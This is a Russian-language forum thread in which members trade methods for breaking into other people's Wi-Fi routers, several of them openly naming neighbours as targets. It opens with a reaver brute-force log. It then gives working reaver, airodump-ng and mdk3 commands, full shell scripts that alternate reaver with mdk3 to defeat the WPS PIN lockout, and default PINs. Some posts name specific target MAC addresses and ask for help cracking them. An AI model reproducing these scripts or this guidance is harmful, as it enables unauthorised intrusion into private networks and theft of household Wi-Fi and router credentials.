[P] AuthKey: 96:ca:2b:52:db:0d:55:6d:65:84:f1:5e:a1:86:30:e9:ff :25:76:bc:b0:46:42:f7:a9:48:a7:70:75:8e:5b:5b<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: af:26:10:fb:70:f6:ea:36:c7:17:7d:16:1b:90:a4:ee:97 :62:58:cc:df:f5:a9:73:9c:2a:77:76:b5:40:02:e1<br/>
[P] E-Hash2: d8:80:d1:39:6d:be:09:f8:6e:dc:8f:da:c6:9d:77:ee:17 :b5:d0:22:b9:6e:cd:e7:46:bc:b6:4a:58:f6:de:30<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received M3 message<br/>
[+] Sending WSC NACK<br/>
[+] Sending WSC NACK<br/>
[!] WPS transaction failed (code: 0x03), re-trying last pin<br/>
[+] Trying pin 00485678.<br/>
[+] Sending EAPOL START request<br/>
[+] Received identity request<br/>
[+] Sending identity response<br/>
[P] E-Nonce: 02:70:ca:90:5d:21:a3:f7:16:70:74:fe:02:57:58:50<br/>
[P] PKE: f9:84:a4:df:e3:7c:66:c3:2b:13:b7:4c:93:b1:c7:ac:d8 :b7:a2:35:20:1d:25:0b:76:60:af:f2:e5:1a:ff:52:a1:4 9:8a:c3:dc:04:69:f4:71:5f:32:4f:b1:26:89:78:7a:90: f0:12:fd:36:81:5a:cc:29:4f:26:b3:12:14:9c:62:0a:86 :8a:e0:32:08:f2:81:5a:9b:82:af:3f:42:7c:5d:cc:1a:4 2:ed:dc:c3:0b:d1:9d:28:a9:89:dd:b3:8b:41:0b:db:7c: 92:be:df:e7:cd:3c:86:b4:c3:7d:94:94:c2:38:ef:41:aa :68:b7:e9:72:66:b6:3e:d8:22:ca:b9:9e:36:3f:62:d9:2 d:1a:ba:9d:c1:7c:8d:3a:bd:f8:4e:ec:df:6d:9b:f1:ef: be:60:03:b8:df:d4:01:1d:f1:11:73:00:8a:3a:67:d8:c9 :4b:b6:5b:5f:e9:d0:fa:e8:d8:09:2c:9a:3f:6c:b8:86:8 1:13:62:0a:b9:2e:3b:7f:cc<br/>
[P] WPS Manufacturer: SERCOMM<br/>
[P] WPS Model Name: RV6688BCM<br/>
[P] WPS Model Number: RV6688BCM<br/>
[P] Access Point Serial Number: 53434F4D14150793<br/>
[+] Received M1 message<br/>
[P] R-Nonce: f5:ad:86:c4:33:50:d7:0b:32:a6:12:92:6b:85:03:dd<br/>
[P] PKR: 19:c9:96:a4:52:39:de:ee:47:9d:c9:b2:d6:df:66:07:6a :48:98:c8:74:81:fb:64:2b:85:6a:f0:ad:4d:33:55:f4:4 2:73:e9:f2:6a:fa:da:6b:b5:c1:ef:3e:ec:38:a7:a4:d3: 60:99:9e:3c:f1:45:c7:05:d6:81:a2:23:a6:9d:93:27:1e :1c:ea:90:6e:c3:1a:df:a6:e6:06:1a:53:54:48:6d:44:4 5:64:1a:a4:3a:64:11:b7:34:5e:85:d4:0c:27:e9:30:de: 08:da:f1:4d:19:19:de:b1:11:4b:a4:bb:01:a6:b0:96:ad :62:0b:c4:49:bb:2e:c2:a6:be:c9:a1:02:19:e9:bd:b5:5 1:1f:ed:1a:74:7b:39:40:e5:29:81:62:e3:e1:99:df:e3: eb:89:bd:4e:f3:e0:14:b2:54:63:ec:16:ed:3c:57:66:3a :f6:e3:b5:9b:1f:e1:11:8b:eb:69:e8:f8:9d:e7:2b:a7:8 3:71:c7:95:14:96:a4:e1:b4<br/>
[P] AuthKey: 04:09:da:d7:84:0b:8c:22:0b:f4:d8:e5:22:99:74:6e:ff :21:9e:19:d1:77:fa:8f:fc:b8:23:d8:fe:01:6d:a5<br/>
[+] Sending M2 message<br/>
[P] E-Hash1: f5:56:e9:02:aa:55:03:2c:b7:83:cf:bb:9f:84:74:4d:44 :9b:c9:07:2f:eb:28:f2:8e:ff:1d:88:77:93:21:22<br/>
[P] E-Hash2: 85:17:14:1c:ad:44:92:48:c6:a7:0b:22:eb:33:60:48:84 :8e:08:4a:3f:d2:64:cf:ff:55:59:3a:c7:4e:30:15<br/>
[+] Received M3 message<br/>
[+] Sending M4 message<br/>
[+] Received WSC NACK<br/>
[+] Sending WSC NACK<br/>
[+] p1_index set to 60<br/>
[+] Pin count advanced: 60. Max pin attempts: 11000<br/>
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking<br/>
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking<br/>
<br/>
/QUOTE]


[/quote]

x10
24.12.2016, 23:36
Если как то поможет могу системны журнал с роутера скинуть.

binarymaster
25.12.2016, 01:29
Вау ЧЕЛ ТЫ ГЕНИЙ))) ! ЭТО ГОВОРИТ ОТОМ ЧТО Я СЛОМАЮ СОСЕДЕЙ) ПИН ТАКОЙЖЕ КАК И В НАСТРОЙКАХ РОУТЕРА! КРУТЯК



Не забудьте пополнить базу 3WiFi, посканировав его Router Scan'ом.

x10
25.12.2016, 01:38
ок сделаю! только до щитка доберусь)

СЕРЖ32
25.12.2016, 15:44
Вы тут пишите:прогнать хендшейк по словарю на пин....Вопрос возник,причём тут пин к хендшейку?разве пин код найдёться прогнав хендшейк?

CRACK211
25.12.2016, 15:56
Вы тут пишите:прогнать хендшейк по словарю на пин....Вопрос возник,причём тут пин к хендшейку?разве пин код найдёться прогнав хендшейк?



Нет. Наверное имеется ввиду особенность некоторых роутеров использующих в качестве ключа от сети wpspin.например в роутерах tp-link пароли=Wps pin. Наверное есть и другие роутеры которые так работают.Соответственно найдя пароль по хендшейку можно узнать и wpspin.но при условии что дефолтный пароль не был сменён )))

СЕРЖ32
25.12.2016, 16:11
Нет. Наверное имеется ввиду особенность некоторых роутеров использующих в качестве ключа от сети wpspin.например в роутерах tp-link пароли=Wps pin. Наверное есть и другие роутеры которые так работают.Соответственно найдя пароль по хендшейку можно узнать и wpspin.но при условии что дефолтный пароль не был сменён )))



та фантастика какая то)))

CRACK211
25.12.2016, 16:41
та фантастика какая то)))



Посмотрите статистику по tp-link в ветке перебора и на 3wifiчаще всего пароль 8 цифр. А на 3wifi можно увидеть что key=wps pin)))

СЕРЖ32
25.12.2016, 21:28
кстати,у кого то получалось с pixie wps открыть точки,которые не попадают в список уязвимых?ну на чипе Atheros например,просто TP LINKи на таком чипе как правило.Или этот метод подходит только к тем чипам,которые в списке указыны?

x10
25.12.2016, 21:38
кстати,у кого то получалось с pixie wps открыть точки,которые не попадают в список уязвимых?ну на чипе Atheros например,просто TP LINKи на таком чипе как правило.Или этот метод подходит только к тем чипам,которые в списке указыны?



а можно глянуть на этот список, спасибо!

СЕРЖ32
25.12.2016, 22:29
а можно глянуть на этот список, спасибо!



ну вот:https://docs.google.com/spreadsheet...PTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923

СЕРЖ32
25.12.2016, 22:35
странно чесно говоря,зачем они в этот список записали роутеры,которые не уязвимы,например TP LINK

TL-WR740N,я думал список,это те роутеры,которые уязвимы,что ж они все роутеры записали,

TL-WR740N точно не уязвим,хотя может кто то и пробовал....

x10
25.12.2016, 23:12
странно чесно говоря,зачем они в этот список записали роутеры,которые не уязвимы,например TP LINK

TL-WR740N,я думал список,это те роутеры,которые уязвимы,что ж они все роутеры записали,

TL-WR740N точно не уязвим,хотя может кто то и пробовал....



а ты столбик WPS посмотри я не вижу что он подвержен какай либо атаке из имеющейся, или просто неизвестно в описании говорится что список неполный

erwerr2321
27.12.2016, 04:10
кто знает как взломать админку на tplink?



Ну СЕРЖ знает... А чё такое то?

Случилось чего, старина?

Stas956457
27.12.2016, 16:57
я узнал пароль к точке доступа,а посмотреть какой пароль wps не могу

binarymaster
27.12.2016, 17:10
я узнал пароль к точке доступа,а посмотреть какой пароль wps не могу



Захватывайте хозяина точки. Принуждайте его силой мысли залогиниться в админке. И перехватывайте пароль к ней.

СЕРЖ32
28.12.2016, 03:07
скажите,кто какие флаги вообще ставит в pixie wps dust?ну я имею ввиду,какие обязательно лучше поставить,а то их вон дофига:

Обязательныеаргументы:

-i,--interface=Имясетевогоинтерфейс адляиспользования

-b,--bssid= BSSIDточкидоступа

Опциональныеаргументы:

-m,--mac= MACхостовойсистемы

-e,--essid=ESSIDцелевойТД

-c,--channel= Установитьканал802.11дляинте рфейса(подразумевает-f)

-o,--out-file= Установитьвыводвлог-файл[stdout]

-s,--session=Восстановитьфайлпреды дущейсессии

-C,--exec=Выполнитьданнуюкоманду ослеуспешногоподборапина

-D,--daemonize Переводreaverврежимдемона

-a,--autoАвтоматическиопределить лучшиепродвинутыеопциидля целевойТД

-f,--fixed Отключитьпрыганиепоканала м

-5,--5ghzИспользоватьканалы5GHz802.11

-v,--verbose Отображатьнекритическиепр едупреждения(-vvчтобыувидетьбольше)

-q,--quiet Отображатьтолькокритическ иепредупреждения

-K--pixie-dust= [1]ЗапускаетpixiewpsсPKE,PKR,E-Hash1,E-Hash2,E-NonceиAuthkey(Ralink,Broadcom,Realtek)

-Z,--no-auto-passНЕзапускатьreaverдляавтома тическогополученияпароляWP A,еслиатакаpixiewpsпрошлауспеш но

-h,--helpПоказатьсправку

Продвинутыеопции:

-p,--pin= Использоватьзаданный4или8ц ифровойWPSпин

-d,--delay= Установитьзадержкумеждупо пыткамипина[1]

-l,--lock-delay=Установитьвремяожидани я,еслиТДзаблокировалапопы киводапина[60]

-g,--max-attempts=Выйтипослечислапопыт кпина

-x,--fail-wait= Установитьвремядляпаузыпо сле10неожиданныхнеудач[0]

-r,--recurring-delay= Делатьпаузунаyсекундкажды xпопытокпина

-t,--timeout= Установитьпиреодтаймаутап олучения[5]

-T,--m57-timeout= УстановитьпериодтаймаутаM5/M7[0.20]

-A,--no-associateНесвязыватьсясТД(связ ьдолжнабытьсделанадругимп риложением)

-N,--no-nacksНеотправлятьсообщенияNAC Kкогдаполученыпакетыонеис равности

-S,--dh-smallИспользоватьмалыеDHключ дляускоренияскоростивзло а

-L,--ignore-locksИгнорироватьзаблокиров нныесостояния,полученныео тцелевойТД

-E,--eap-terminate ЗавершатькаждуюсессиюWPSпа етомEAP FAIL

-n,--nackЦелеваяТДвсегдашлётпаке тыNACK[Auto]

-w,--win7МимикрироватьподWindows7regist rar[False]

-X,--exhaustiveУстановитьисчерпываю щийрежимсначаласессии[False]

-1,--p1-indexУстановитьначальныйинд ксмассивадляпервойполови ыпина[False]

-2,--p2-indexУстановитьначальныйинд ксмассивадлявторойполови ыпина[False]

-P,--pixiedust-loopУстановкаврежимPixieLoop(нео тправляетM4иделаетпетлюнаM3 )[False]

-W,--generate-pinГенерациядефолтныхпинов ткомандыdevttys0[1]Belkin[2]D-Link

-H,--pixiedust-log Включитьлогированиепослед овательностейзавершённыхPi xieHashes

Ну вот и какую команду,с каким набором флагов поставить?

Интересна опция -Н(

Опция -H // —pixiedust-log в reaver

Опция -H — это переключатель включения логирования PixieHashes, сохранённые хеши будут размещены в директории запуска. Эта опция требует включения хотя бы -vvv, и, соответственно, работает с -K 1 & -P.

Имена сохранённых файлов соответствуют bssid (MAC) цели и имеют расширение .pixie. Внутри этих сохранённых логов вы найдёте все требуемые хеши PixieDust, а также готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x ).

И тут возникает вопрос,а как сделать эти готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x ).Т.е как выполнить эти полные команды,как закинуть файл в шелл и выполнить?Так как интересная вещь,насобирал штук 10 разных,не одинаковых хешей,потом по одному выполнить и мало ли,из 10 хешей и пин может найтись!Короче вопрос,как выполнить эти команды,как эти файлы в шелл закинуть и выполнить?Кто то уже так пробовал?

binarymaster
28.12.2016, 10:59
скажите,кто какие флаги вообще ставит в pixie wps dust?



reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1

Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов.

СЕРЖ32
29.12.2016, 00:27
reaver -i wlanXmon -v -c X -b XX:XX:XX:XX:XX:XX -K 1

Что ещё нужно для счастья? Ну конечно же мануал, переведённый гугл транслейтом, и избавленный от лишних пробелов.


та это самая обычная команда,а флагов то вон полно,неужели все ненужные?

binarymaster
29.12.2016, 00:47
та это самая обычная команда,а флагов то вон полно,неужели все ненужные?



По ситуации. Иногда использую "-d 0", когда точка быстро обрабатывает пины.

СЕРЖ32
29.12.2016, 01:13
По ситуации. Иногда использую "-d 0", когда точка быстро обрабатывает пины.



она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....

binarymaster
29.12.2016, 01:26
она как быстро обрабатывает,так и быстро лочится))))сейчас это уже редкость,точки,на которых спокойно пины перебирать можно,сейчас все точки в лок уходят и как правило до ребута....



Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).

СЕРЖ32
29.12.2016, 02:15
Как повезёт. Старенькие D-Link, которые всё ещё стоят за окошками ни в чём не подозревающих юзверей, до сих пор встречаются. И у меня самого такой стоял однажды, со включённым WPS, около 3-х лет! (да, я тогда ещё не знал, мы все когда-то не знали).



везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....

erwerr2321
29.12.2016, 04:42
может кто подскажет)



ну ваще хз, мен, может СЕРЖ?

tp-link
29.12.2016, 11:38
везёт тебе,у меня вокруг одни тп линки.которые лочаться до перезагруза и доссу не подвержены,пофиг им досс....



1.подключись к сетке на месяц и RS проскань,и будет тебе счастье.

2.дай соседу 500р. типа срочно нужен инет и делай с точкой что хочешь(мне помогло на прошлой квартире там Хувеи РТК стояли с дефпаролями,включил пин и усё)

3. зайди на НГ к соседу и спроси пароль

mazik
29.12.2016, 13:07
http://images.vfl.ru/ii/1483002690/71a4b2e9/15490344.jpg

Stanley_Overman
03.01.2017, 11:54
Всех с наступившим Новым годом и наступающим Рождеством (кто что отмечает)! Может кто готов в эти нелегкие времена прийти на помощь ближнему и поспособствовать в добывании pin:

SSID: ELTEX-EE9E

A8:F9:4B:60:EE:9F

Премного благодарен!

СЕРЖ32
04.01.2017, 21:33
кто уже так пробовал в pixiewps

reaver -i wlan0mon -vvv -P -H -K 1 -b 00:00:00:00:00:00 -c 1?я имею ввиду опция -Н,т.е сбор хешей,ну насобирать тясячи таких хешей,а они то все разные,а потом

chmod a+x 000000000000.pixie

./000000000000.pixie

Я так попробовал,мин 5 собирал хешы,потом их все запустил,нифига))не по одному хешу не найден пин))

Вот и спрашиваю,кто то так пробовал,у кого получалось из десяток,сотен,тысяч и тд хешей,найти пин?Кстати в этой команде и -К не нужно ставить,если уж захотели хешей насобирать...

toexc
10.01.2017, 00:56
Да, по этим словарям уже прогнал, не то. Видимо, это какая-то обновленная версия прошивки. Неделю назад соседям установили такой же роутер. Сигнал еще лучше, чем у первой жертвы. Однако, WPS тоже не брутится. Судя по всему, алгоритм в роутере вычисляет попытку брута и включает некую защиту: в какой-то момент типа принимает первую часть пина, ну а вторую часть бесконечно динамит. Кто-нибудь знает, как обойти эту защиту?



У вас получилось узнать wpa key к Ростелекомовскому ZTE ZXHN H118N? Я так же Reaver'ом прошёлся безрезультатно.

startless
10.01.2017, 03:07
У вас получилось узнать wpa key к Ростелекомовскому ZTE ZXHN H118N? Я так же Reaver'ом прошёлся безрезультатно.



Перепробовал все методы, что были доступны. Результата нет. Забросил. Через wps безсмысленно пытаться. Тут либо брутить хендшейки, либо мониторить airodump'ом эфир в надежде, что пароль проскочит.

СЕРЖ32
10.01.2017, 22:46
Перепробовал все методы, что были доступны. Результата нет. Забросил. Через wps безсмысленно пытаться. Тут либо брутить хендшейки, либо мониторить airodump'ом эфир в надежде, что пароль проскочит.



а как он там проскочить может?все б так наверное ловили бы))

Linksach
11.01.2017, 00:08
а как он там проскочить может?все б так наверное ловили бы))



он видимо имел ввиду появление пароля при подключении клиента к сети при мониторинге airodumpom

СЕРЖ32
11.01.2017, 00:52
он видимо имел ввиду появление пароля при подключении клиента к сети при мониторинге airodumpom



та никакой пароль в открытом виде не может проскочить,в зашифрованом это да,а то все б так ловили

Linksach
11.01.2017, 01:02
та никакой пароль в открытом виде не может проскочить,в зашифрованом это да,а то все б так ловили


а он разве писал про пароль в открытом виде,читайте внимательно?

в его сообщении говорится просто про пароль-что значить пойманный хендшейк

СЕРЖ32
11.01.2017, 01:04
а он разве писал про пароль в открытом виде,читайте внимательно?

в его сообщении говорится просто про пароль



он наверняка так и думал,что в открытом виде,а в закрытом и так спокойно поймать можно...

Linksach
11.01.2017, 01:10
он наверняка так и думал,что в открытом виде,а в закрытом и так спокойно поймать можно...



без наличия клиента пароль (хендшейк)не поймаешь никак хоть год сиди и мониторь

СЕРЖ32
11.01.2017, 01:20
без наличия клиента пароль (хендшейк)не поймаешь никак хоть год сиди и мониторь



кстати,а отследить pin wps интересно возможно,тем же wireshark например?было бы интересно так пины добывать

Linksach
11.01.2017, 01:30
кстати,а отследить pin wps интересно возможно,тем же wireshark например?было бы интересно так пины добывать


нет,нельзя-вайришарком можно только мониторить сеть,следить за трафиком и куда клиент заходит, и в результате

познакомится с человеком поближе!

можно помоему перехватить пароли авторизации от сайтов-но я не пробовал

startless
11.01.2017, 06:09
http://images.vfl.ru/ii/1484096718/7cd2547c/15617896.jpg

Пароль в открытом виде искать в поле Probe. В подавляющем большинстве случаев здесь или название сети, или название устройства, или прочий бред. Пароль может быть только в том случае, если кто-то указал его в качестве названия своего гаджета (даже не подозревая, что гаджет будет им светить всюду ). Понять, что это пароль, можно только по косвенным признакам: должно быть не менее 8 символов и он не должен совпадать с названием ассоциированной точки (как правило). Ну а проверить валидность пароля - либо попробовать с ним подключиться, либо ловить хендшейки у ассоциированных пар и, выдернув последовательности символов из Probe, брутить.

ORi0N
11.01.2017, 10:25
либо мониторить airodump'ом эфир в надежде, что пароль проскочит



Согласен, попадают пароли.

airodump-ng mon0 -w /root/Desktop/log

и

mdk3 mon0 d

Оставил записывать на несколько часов и в результате нашел в логах 2 пароля которые здесь не могли подобрать

СЕРЖ32
11.01.2017, 21:20
Согласен, попадают пароли.

airodump-ng mon0 -w /root/Desktop/log

и

mdk3 mon0 d

Оставил записывать на несколько часов и в результате нашел в логах 2 пароля которые здесь не могли подобрать


как потом из лога именно пароли нашёл?как фильтр прописал?

СЕРЖ32
11.01.2017, 21:25
а можно ли перебрать пины,без отправки пакета М4?т.е только М1,М2,М3?

binarymaster
11.01.2017, 21:38
а можно ли перебрать пины,без отправки пакета М4?



Любое отклонение от стандарта - не есть хорошо. Будет неопределённое поведение, в зависимости от программы в прошивке роутера.

Как это проверить на практике? Изменить исходный код reaver, например, и пересобрать его.

СЕРЖ32
11.01.2017, 21:44
Любое отклонение от стандарта - не есть хорошо. Будет неопределённое поведение, в зависимости от программы в прошивке роутера.

Как это проверить на практике? Изменить исходный код reaver, например, и пересобрать его.



та просто таким образом можно было бы исключить блокировку wps при переборе,т.е роутер не смог бы что либо заподозрить,если не отправлять пакет М4 и тем самым не будет лока wps(но это в теории)

ORi0N
11.01.2017, 22:46
как потом из лога именно пароли нашёл?как фильтр прописал?



Да там все просто... Открываешь сохраненный *.csv и в колонке Probed ESSIDs смотришь... среди названий точек попадают и пароли...но это редкость

Payer
11.01.2017, 22:51
но это редкость



После MDK3 не такая уже и редкость.

Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.

ORi0N
11.01.2017, 23:16
После MDK3 не такая уже и редкость.

Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.



Ну да, MDK3 делает хорошую дискотеку в эфире, хендшейки летят... Но мне кажется что пароли проходят через подключения со смартфонов... хотя хз...

СЕРЖ32
11.01.2017, 23:25
Да там все просто... Открываешь сохраненный *.csv и в колонке Probed ESSIDs смотришь... среди названий точек попадают и пароли...но это редкость



так а как понять,что это именно пароли?а пин кода wps там не попадается?

СЕРЖ32
11.01.2017, 23:26
После MDK3 не такая уже и редкость.

Особенно недалекие люди начинают с матюками вводить многократно пароли и названия точки и в итоге результат.



mdk3 с какими именно параметрами?там же опций много....mdk3 на деаут клиентов что ли?

СЕРЖ32
11.01.2017, 23:27
Ну да, MDK3 делает хорошую дискотеку в эфире, хендшейки летят... Но мне кажется что пароли проходят через подключения со смартфонов... хотя хз...



та если бы не хендшейки летели,а пароли в открытом виде или пины wps,то цены не было бы

2serg2
14.01.2017, 12:16
Подскажите, как разблокировать WPS у роутера TL-WR841 без сброса к заводским настройкам? WPS заблокировался после попыток подбора PIN-кода. Перезагрузка роутера не помогает.

Alexmeh
14.01.2017, 12:22
Подскажите, как разблокировать WPS у роутера TL-WR841 без сброса к заводским настройкам? WPS заблокировался после попыток подбора PIN-кода. Перезагрузка роутера не помогает.



Зайти в админку роутера и включить WPS

http://www.tp-linkru.com/faq-87.html

Руководство:

http://static.tp-link.com/res/down/doc/TL-WR841ND_V11_UG.pdf

ПУНКТ 4.4 WPS

И учитесь пользоваться поиском!

2serg2
14.01.2017, 13:00
Зайти в админку роутера и включить WPS

http://static.tp-link.com/res/down/doc/TL-WR841ND_V11_UG.pdf



Снял галочку напротив Отключить PIN-код маршрутизатора и WPS заработал. Выходит, после атаки автоматически включается эта настройка.

binarymaster
14.01.2017, 14:28
Выходит, после атаки автоматически включается эта настройка.



Точнее, после нескольких неверных попыток, да.

binarymaster
14.01.2017, 23:11
пожалуйста помогите взломать dlink или netis по wps. Как их лучше взломать?



Лучше всего кувалдой, но если таковой не имеется, и монтировка сойдёт.

И предвещая негодование от моего ответа, подскажу, что эти предоставленные названия ничего не говорят, нужно больше данных.

DSL2650NRU
15.01.2017, 10:52
та я уже не раз пробивал все mac адреса на 3wifi.stascorp,ни один пароль не подошел,поэтому и спрашиваю может есть другой способ или сайт?



Ривер с пикси. Также у длинков очень часто используют статичный или легко вычисляемый пароль.

qwertys76
16.01.2017, 20:07
та я уже не раз пробивал все mac адреса на 3wifi.stascorp,ни один пароль не подошел,поэтому и спрашиваю может есть другой способ или сайт?



напишите названия моделей этих роутеров. больше будет вариантов подсказок

ensto
16.01.2017, 21:27
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.



Использую скрипт от VladimirV.

Есть проблема, reaver не останавливается после десятой попытки (ключ -g 10), а продолжает пытаться подбирать пин дальше:

[+] p1_index set to 160

[+] Pin count advanced: 160. Max pin attempts: 10

[+] 2000.00% complete. Elapsed time: 0d0h2m6s.

[+] Estimated Remaining time: 0d0h2m6s

Из-за этого не может запуститься mdk3.

Кто с таким сталкивался, как это победить?

ensto
17.01.2017, 00:15
Спасибо, VladimirV за помощь. Было пару трудностей. Может кому-то понадобиться.


killall -s INT -w reaver - добавил эти два ключа, иначе буксует на месте, не сохраняет последний пин перед закрытием reaver.

reaver -a - ключ убирает запрос: продолжить предыдущую сессию.

"mdk3 mon0 a -a 10:FE:ED:5A:XX:XX -m"; -m без этого ключа у меня, TP-Link не сбрасывал счетчик 10 неудачных попыток.

grek-6630
18.01.2017, 21:56
Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.

Вот его код:


#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;

У меня он не заработал и я его переделал:


#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;

и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.



Эти команды в терминале вводить надо? Или скрипт куда то помещать надо?

VladimirV
18.01.2017, 22:14
Эти команды в терминале вводить надо? Или скрипт куда то помещать надо?



Нашел переделанный скрипт, проверю, выложу.

binarymaster
19.01.2017, 11:12
Куда его поместить нужно?



Куда угодно, но чтобы к нему при этом доступ из терминала был.



а как скрипт правильно запустить?



Перейти в директорию со скриптом, дать права на исполнение, а затем запустить.


cd TpLink/
chmod +x TpLink.sh
./TpLink.sh

grek-6630
19.01.2017, 12:47
Куда угодно, но чтобы к нему при этом доступ из терминала был.

Перейти в директорию со скриптом, дать права на исполнение, а затем запустить.


cd TpLink/
chmod +x TpLink.sh
./TpLink.sh




Этот скрипт для TpLink только или для любого роутэра? Которая мне нужна сетка ASUS ( роутэр ) , подойдет ли ?

binarymaster
19.01.2017, 13:53
Этот скрипт для TpLink только или для любого роутэра? Которая мне нужна сетка ASUS ( роутэр ) , подойдет ли ?



В этой области нельзя ничего сказать заранее.

Olegdn
24.01.2017, 20:06
Доброго времени! прошу помочь с подключением к:

Роутер: Asus Rt n10 lx

Мак: 54:04:A6:5C:30:9C

DSL2650NRU
24.01.2017, 20:29
Доброго времени! прошу помочь с подключением к:

Роутер: Asus Rt n10 lx

Мак: 54:04:A6:5C:30:9C



Асус-пин пробовали? 00286022

И статический - 73782575

ilya_mail
24.01.2017, 23:10
Добрый вечер есть данный мас 74:B5:7E:E3:99:04

Подписанный как UKrtelrcom_e39904

Pin locked

Как попробовать его взломать?

Vovan71
24.01.2017, 23:18
То есть правильно я понял - волшебный скрипт работает с уже наглухо лоченой точкой? И она будучи лоченой - отвечает?!

Если так то прям ВАУ

ilya_mail
25.01.2017, 01:04
То есть правильно я понял - волшебный скрипт работает с уже наглухо лоченой точкой? И она будучи лоченой - отвечает?!

Если так то прям ВАУ


Что мне предпринять пин я через телефон пробил 49158441

ilya_mail
25.01.2017, 07:46
Что мне предпринять пин я через телефон пробил 49158441



Попробовал через утилиту qss но результата нет

Olegdn
25.01.2017, 15:28
Асус-пин пробовали? 00286022

И статический - 73782575



спасибо, к сожалению, ни тот ни другой не подходят.

g-n0m_ru
30.01.2017, 12:38
Доброго времени суток!!!

Меня тут коснулась одна проблема .. есть некий роутер D-link dir-300nru , на него мне удалось получить WPS и пароль на Wifi и пароль на админку.

Но радость кончилась , т.к. хозяин роутера запретил WPS, сменил пасс на Wifi.... и сделал точку скрытой

Зная WPS pin как я могу залезать на него... пробовал знаменитый Скрипт https://github.com/r0bag/pentest/blob/master/ReVdK3-r3.sh..

Но точка не поддается...и проблема в том что ReVdK3 начинает с начала каждый раз перебор WPS.. где он хранит лог сессии ? чтобы я смог поставить нужный WPS PIN может он все же после длительного времени сможет пробиться ???

Или посоветуйте что нить как мне ломануться на точку...Подбор пароля по рукопожатиям не вариант зная способности хозяина точки ..

Жду советов!

Спасибо заранее..

user100
30.01.2017, 12:44
Доброго времени суток!!!

Меня тут коснулась одна проблема .. есть некий роутер D-link dir-300nru , на него мне удалось получить WPS и пароль на Wifi и пароль на админку.

Но радость кончилась , т.к. хозяин роутера запретил WPS, сменил пасс на Wifi.... и сделал точку скрытой

Зная WPS pin как я могу залезать на него... пробовал знаменитый Скрипт https://github.com/r0bag/pentest/blob/master/ReVdK3-r3.sh..

Но точка не поддается...и проблема в том что ReVdK3 начинает с начала каждый раз перебор WPS.. где он хранит лог сессии ? чтобы я смог поставить нужный WPS PIN может он все же после длительного времени сможет пробиться ???

Или посоветуйте что нить как мне ломануться на точку...Подбор пароля по рукопожатиям не вариант зная способности хозяина точки ..

Жду советов!

Спасибо заранее..



Вы сами ответили на свой вопрос: хозяин роутера запретил WPS, поэтому ReVdK3-r3 работать с этой точкой не будет. Ловите хендшейк и выкладывайте в тему подбора.

g-n0m_ru
30.01.2017, 12:48
Я конечно могу и ошибаться ,но ReVdK3-r3 и был задуман для случаев с WPS Locked.. аля залезать через задню дверь с помощью лома.